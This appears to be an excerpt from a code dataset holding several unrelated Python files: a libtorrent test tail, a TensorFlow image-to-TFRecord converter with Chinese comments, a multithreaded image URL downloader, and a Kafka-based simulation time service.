self.assertEqual(str(alert), alert.message())
self.assertEqual(alert.external_address, "1.2.3.4")
if __name__ == '__main__':
print(lt.__version__)
try:
shutil.copy(os.path.join('..', '..', 'test', 'test_torrents',
'url_seed_multi.torrent'), '.')
except shutil.SameFileError:
pass
try:
shutil.copy(os.path.join('..', '..', 'test', 'test_torrents',
'base.torrent'), '.')
except shutil.SameFileError:
pass
try:
shutil.copy(os.path.join('..', '..', 'test', 'test_torrents',
'unordered.torrent'), '.')
except shutil.SameFileError:
pass
unittest.main()
|
tfrecord.py
|
# coding:utf-8
# 2019-1-10
# tf-record tool
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
import logging
__all__ = ['main']
def check_and_set_default_args(input_para):
assert not (input_para['train_shards'] % input_para['num_threads'] and input_para['validation_shards'] % input_para['num_threads']), ("train_shards 和 validation_shards 必须是 num_threads 的公约数")
def _find_image_files(data_dir,
labels_file,
class_label_base):
"""
return:
filenames : list, data_dir下所有图片名
texts : list, 父文件名
labels : list, 每张图片对应的分类索引,下标从class_label_base开始
"""
logging.info('处理的数据来源于 %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()] # 获得需要处理的文件列表
labels, filenames, texts = [], [], []
label_index = class_label_base
# 各个文件夹下的图片
for text in unique_labels:
pic_file_pattern = '%s/%s/*' % (data_dir, text) # 匹配格式 `*` 通配符
matching_files = []
try:
matching_files = tf.gfile.Glob(pic_file_pattern)
except:
pass
labels.extend([label_index] * len(matching_files)) # 分类索引
texts.extend([text] * len(matching_files)) # 父文件夹名
filenames.extend(matching_files) # 图片名
logging.info("第 %s 个分类,共处理文件 %s 个" % (
label_index, len(labels)))
label_index += 1
# 打乱列表
shuffled_index = [i for i in range(len(filenames))]
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
logging.info('在 %s 内, 共找到 %d 张图片, %d 个标签' %
(data_dir, len(filenames), len(unique_labels)))
return filenames, texts, labels
class ImageCoder(object):
"""
将TensorFlow图像读取转换
"""
def __init__(self):
self._sess = tf.Session() # 创建Session处理图像
# 将PNG转换为JPEG
self._png_data = tf.placeholder(dtype=tf.string) # 读取图片未经过解码为字符串
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# JPEG解码
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3, '图片不是三通道'
return image
def _is_png(filename):
"""
return bool
"""
return '.png' in filename
def _process_image(filename, coder):
"""
读取图片
return:
image_buffer: string, JPEG
height: int
width: int
"""
with open(filename, 'rb') as f:
image_data = f.read()
if _is_png(filename):
logging.info('%s 转换为JPEG格式' % filename)
image_data = coder.png_to_jpeg(image_data)
image = coder.decode_jpeg(image_data) # JPEG解码,解码后可获得图像属性
assert len(image.shape) == 3
assert image.shape[2] == 3, '图像不是三通道'
height, width = image.shape[0], image.shape[1]
return image_data, height, width
def _int64_feature(value):
"""
转换为int64格式
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""
转换为bytes
"""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename,
image_buffer,
label,
text,
height,
width):
"""
使用tf.train.Example生成 Example proto
"""
colorspace = b'RGB'
channels = 3
image_format = b'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(str.encode(text)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(str.encode(filename))),
'image/encoded': _bytes_feature(image_buffer)}))
return example
def _process_image_files_batch(coder,
thread_index,
ranges,
name,
filenames,
texts,
labels,
num_shards,
output_dir,
dataset_name):
"""
每个线程的call函数
"""
num_threads = len(ranges) # 计算线程数
assert not num_shards % num_threads, 'num_shars必须能整除num_threads'
num_shards_per_batch = int(num_shards / num_threads) # 每个线程需要处理的数据
shard_ranges = np.linspace(
ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0] # 计算当前线程需要处理的图像数量
counter = 0
for s in range(num_shards_per_batch):
shard = thread_index * num_shards_per_batch + s # 计算当前图像处理批次
output_filename = '%s_%s_%.5d-of-%.5d.tfrecord' % (dataset_name, name, shard, num_shards)
output_file = os.path.join(output_dir, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int) # 获得当前处理的文件索引
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(
filename,
image_buffer,
label,
text,
height,
width) # tf.train.Features 格式化数据
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 300:
logging.info('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
logging.info('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
logging.info('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name,
filenames,
texts,
labels,
num_shards,
num_threads,
output_dir,
dataset_name):
# 判断图片是否对应标签
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# 将列表分割为num_threads份
# np.linspace(0, 20, 4 + 1).astype(np.int)
# [ 0 5 10 15 20]
spacing = np.linspace(0, len(filenames), num_threads + 1).astype(np.int)
# 组合索引
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
logging.info('开启 %s 个线程' % num_threads)
sys.stdout.flush() # 刷新输出
coord = tf.train.Coordinator() # 监控线程
coder = ImageCoder() # 初始化图像处理类
# 线程入队
threads = []
for thread_index in range(len(ranges)): # range(num_threads)
args = (coder, thread_index, ranges, name, filenames, texts, labels, num_shards, output_dir, dataset_name)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
coord.join(threads)
logging.info('%s : 完成 %d 图像的数据转换.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def process_dataset(name,
directory,
num_shards,
labels_file,
num_threads,
output_dir,
dataset_name,
class_label_base):
filenames, texts, labels = _find_image_files(directory, labels_file, class_label_base)
_process_image_files(name, filenames, texts, labels, num_shards, num_threads, output_dir, dataset_name)
def main(input_para):
logging.info('Saving results to %s' % input_para['output_dir'])
process_dataset(
'validation',
input_para['validation_dir'],
input_para['validation_shards'],
input_para['labels_file'],
input_para['num_threads'],
input_para['output_dir'],
input_para['dataset_name'],
input_para['class_label_base'])
process_dataset(
'train',
input_para['train_dir'],
input_para['train_shards'],
input_para['labels_file'],
input_para['output_dir'],
input_para['num_threads'],
input_para['output_dir'],
input_para['dataset_name'],
input_para['class_label_base'])
logging.info('%s : Finish!' % datetime.now())
if __name__ == '__main__':
input_para = {
}
main(input_para)
|
download_urls_multithreading.py
|
#!/usr/bin/env python
"""
Tencent is pleased to support the open source community by making Tencent ML-Images available.
Copyright (C) 2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the BSD 3-Clause License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
https://opensource.org/licenses/BSD-3-Clause
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
import os
import sys
import urllib
import argparse
import threading,signal
import time
import socket
socket.setdefaulttimeout(10.0)
def downloadImg(start, end, url_list, save_dir):
global record,count,count_invalid,is_exit
im_names = []
with open(url_list, 'r') as url_f:
for line in url_f.readlines()[start:end]:
sp = line.rstrip('\n').split('\t')
url = sp[0]
im_name = url.split('/')[-1]
try:
urllib.urlretrieve(url, os.path.join(save_dir, im_name))
record += 1
im_file_Record.write(im_name + '\t' + '\t'.join(sp[1:]) + '\n')
print('url = {} is finished and {} imgs have been downloaded of all {} imgs'.format(url, record, count))
except IOError as e:
print ("The url:{} is ***INVALID***".format(url))
invalid_file.write(url + '\n')
count_invalid += 1
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--url_list', type=str, help='the url list file')
parser.add_argument('--im_list', type=str, default='img.txt',help='the image list file')
parser.add_argument('--num_threads', type=int, default=8, help='the num of processing')
parser.add_argument('--save_dir', type=str, default='./images', help='the directory to save images')
args = parser.parse_args()
url_list = args.url_list
im_list = args.im_list
num_threads = args.num_threads
save_dir = args.save_dir
# create savedir
if not os.path.isdir(save_dir):
os.mkdir(save_dir)
count = 0 # the num of urls
count_invalid = 0 # the num of invalid urls
record = 0
with open(url_list,'r') as f:
for line in f:
count += 1
part = int(count/num_threads)
with open(im_list, 'w') as im_file_Record,open('invalid_url.txt','w') as invalid_file: # record the downloaded imgs
thread_list = []
for i in range(num_threads):
if(i == num_threads-1):
t = threading.Thread(target = downloadImg, kwargs={'start':i*part, 'end':count, 'url_list':url_list, 'save_dir':save_dir})
else:
t = threading.Thread(target = downloadImg, kwargs={'start':i*part, 'end':(i+1)*part, 'url_list':url_list, 'save_dir':save_dir})
t.setDaemon(True)
thread_list.append(t)
t.start()
for i in range(num_threads):
try:
while thread_list[i].isAlive():
pass
except KeyboardInterrupt:
break
if count_invalid==0:
print ("all {} imgs have been downloaded!".format(count))
else:
print("{}/{} imgs have been downloaded, {} URLs are invalid".format(count-count_invalid, count, count_invalid))
|
time_service.py
|
from ..kafka.consumer_manager import ConsumerManager
from datetime import datetime
import threading
import logging
def milliseconds_since_epoch(date):
return int((date - datetime(1970, 1, 1)).total_seconds() * 1000)
def millisecond_since_date(date):
# Get delta time since last update
dt = datetime.now() - date
# Convert dt to milliseconds
return (((dt.days * 24 * 60 * 60 + dt.seconds) * 1000000) + dt.microseconds) / 1000
def get_field_value(message, field, default_value):
try:
return message['decoded_value'][0][field]
except (IndexError, KeyError):
logging.error("Time service: %s field expected in message but not present, assuming %s" %
(field, str(default_value)))
return default_value
def is_field_present(message, field):
try:
check = message['decoded_value'][0][field]
return True
except (IndexError, KeyError):
return False
class TimeService:
def __init__(self,
kafka_system_time_consumer: ConsumerManager):
# Add handler for system time control messages
kafka_system_time_consumer.on_message += self.on_system_time_message
# Time variables
self.localUpdatedSimTimeAt = datetime.now()
self.inputUpdatedAt = milliseconds_since_epoch(self.localUpdatedSimTimeAt)
self.trialTime = milliseconds_since_epoch(self.localUpdatedSimTimeAt)
self.timeElapsed = 0
self.trialTimeSpeed = 1.0 # 0 means pause, 1 is real-time
self.state = "Idle"
# Create threads
self.system_time_consumer_thread = threading.Thread(target=kafka_system_time_consumer.listen_messages)
self.system_time_consumer_thread.setDaemon(True) # Stop this thread if main thread ends
self.system_time_consumer_thread.start()
def stop(self):
self.system_time_consumer_thread.join()
def on_system_time_message(self, message):
# logging.info("system_time message received: " + str(message))
latency = 0 # self.localUpdatedSimTimeAt - self.updatedAt
self.inputUpdatedAt = get_field_value(message, 'updatedAt', self.inputUpdatedAt)
self.trialTimeSpeed = get_field_value(message, 'trialTimeSpeed', self.trialTimeSpeed)
self.timeElapsed = get_field_value(message, 'timeElapsed', self.timeElapsed)
self.state = get_field_value(message, 'state', self.state)
# TrialTime is special. Rx timestamp is not updated if this field is not present
if is_field_present(message, 'trialTime'):
self.localUpdatedSimTimeAt = datetime.now()
self.trialTime = message['decoded_value'][0]['trialTime'] + (latency * self.trialTimeSpeed)
else:
logging.error("Time service: trialTime field expected in message but not present")
def get_trial_date(self):
""" Returns UTC date of trial time """
# Return elapsed if not idle otherwise return date
elapsed_ms = millisecond_since_date(self.localUpdatedSimTimeAt) * self.trialTimeSpeed
return datetime.fromtimestamp((self.trialTime + elapsed_ms) / 1000.0) if self.state is not "Idle" else datetime.now()
def get_trial_elapsed_time(self):
""" Returns number of milliseconds elapsed since Unix Epoch """
return self.trialTime + millisecond_since_date(self.localUpdatedSimTimeAt)
def get_trial_speed(self):
""" Returns current trial speed """
return self.trialTimeSpeed
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.